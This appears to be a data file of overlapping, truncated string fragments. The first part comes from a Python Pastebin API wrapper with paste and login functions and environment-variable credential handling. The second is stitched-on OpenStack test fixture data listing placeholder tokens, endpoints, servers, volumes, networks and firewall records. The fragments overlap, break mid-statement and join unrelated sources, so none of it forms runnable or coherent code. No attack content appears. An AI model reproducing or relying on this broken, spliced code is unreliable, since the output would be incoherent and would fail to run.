"keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text",
"PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response) # Authenticate",
"with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a file named",
"paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url =",
"paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if",
"PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously",
"if r.status_code == 200 and 'Bad' not in r.text: return r.text else: raise",
"well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD =",
"{ 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' :",
"> Function Argument > Constant Defined Here # Recommended: Set confidential information as",
"def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key'",
"run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' #",
"> Constant Defined Here # Recommended: Set confidential information as environment variables with",
"= '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin # Returns:",
"and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = ''",
"import requests, os # Precedence of Confidential Information: # Environment Variable > Function",
"Argument > Constant Defined Here # Recommended: Set confidential information as environment variables",
"Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information:",
"else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self):",
"== 200 and 'Bad' not in r.text: return r.text else: raise LoginError(r.text) class",
"and 'Bad' not in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def",
"} url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and",
"option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key'",
"return repr(self.response) # Authenticate with Pastebin with username and password # Returns: user_key,",
"a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY',",
": os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r =",
"__init__(self, response): self.response = response def __str__(self): return repr(self.response) # Authenticate with Pastebin",
"file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME",
": os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url",
"def __str__(self): return repr(self.response) # Authenticate with Pastebin with username and password #",
"LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response)",
"# Light Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests,",
"https://pastebin.com/api import requests, os # Precedence of Confidential Information: # Environment Variable >",
"r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in r.text:",
"named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME =",
"Pastes code/text anonymously to Pastebin # Returns: paste_url, the URL containing the paste",
"\"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes",
"# Precedence of Confidential Information: # Environment Variable > Function Argument > Constant",
"'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format'",
"paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r =",
"paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='',",
"\"export\" commands within a file named \"keys\" as well and run \"source keys\".",
"'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php'",
"= requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in r.text: return",
"r.status_code == 200 and 'Bad' not in r.text: return r.text else: raise LoginError(r.text)",
"# By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of",
"Light Pastebin Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os"
] |
[
"PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None,",
"\"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, {",
"[{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume",
"\"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID,",
"Unless required by applicable law or agreed to in writing, software # distributed",
"and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID",
"\"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\":",
"\"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\":",
"u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type':",
"Apache License, Version 2.0 (the \"License\"); you may # not use this file",
"None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\",",
"the License. You may obtain # a copy of the License at #",
"Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL':",
"COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints':",
"= [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS =",
"NETWORK_INTERNAL_ENDPOINT, 'publicURL': NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' },",
"None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\",",
"'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS =",
"{ \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\":",
"PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS = [\"firebcc3-d831-411d-a073-ddc828a7a9id\", \"fi7815f5b-a328-47cb-a5e5-f139c4e476f7\"] FIREWALL_POLICY_IDS = [\"firebcc3-d831-422d-a073-ccc818a7a9id\", \"poa119a8-d25b-45a7-8d1b-88e127885630\"] FIREWALL_IDS",
"\"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] },",
"\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": {",
"\"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\":",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None },",
"80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID,",
"{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\":",
"\"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [",
"\"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\"",
"with the License. You may obtain # a copy of the License at",
"\"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": PROJECT_ID }, { \"admin_state_up\": True,",
"1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [],",
"\"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\"",
"5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\",",
"[{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering",
"'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id':",
"= 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT =",
"SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" }",
"\"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\":",
"\"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [",
"u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } }",
"\"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\",",
"u'links': [ {u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type':",
"\"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\":",
"} ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\":",
"None } ] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\":",
"'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' },",
"\"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"\"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\":",
"\"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True,",
"\"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\":",
"\"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ] }, \"hostId\":",
"= 'http://public:9292' STORAGE_PUBLIC_ENDPOINT = 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT =",
"PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\",",
"'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume'",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] }",
"\"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\":",
"\"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\",",
"\"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1],",
"\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\":",
"\"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ],",
"'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } }",
"False } ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\":",
"\"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\":",
"\"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [",
"\"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\":",
"None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\",",
"\"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\":",
"} ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [",
"[ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ {",
"u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'} ], u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' }",
"you may # not use this file except in compliance with the License.",
"the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58',",
"\"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\",",
"\"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\":",
"= [\"firewal1-d831-422d-a073-ckc818a7a9ab\", \"firewa1l-d831-422d-a073-ckc818a7a9ab\"] METERING_LABEL_IDS = [\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS =",
"FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\":",
"METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT = 'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT",
"= 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links':",
"\"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"is_public\":",
"\"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None,",
"COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version':",
"'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3',",
"], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [ \"http://site:8000/nodata\"",
"\"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\":",
"None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" }, { \"attachments\": [], \"availability_zone\": \"nova\",",
"PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\",",
"[ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\":",
"VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\":",
"], \"id\": UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [",
"{\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\":",
"\"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" }",
"} ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\":",
"'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, { 'endpoints':",
"\"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter",
"\"content_type\":\"application/octet-stream\" } ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14,",
"software # distributed under the License is distributed on an \"AS IS\" BASIS,",
"= { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\",",
"\"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] }",
"'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type':",
"\"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [",
"permissions and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>'",
"FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\",",
"\"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [ { \"checksum\":",
"{ \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\":",
"{u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id':",
"\"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\"",
"'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\":",
"4, \"shared\": False } ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\":",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\":",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"\"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\":",
"\"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\":",
"Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\":",
"'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1',",
"You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'}",
"NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS =",
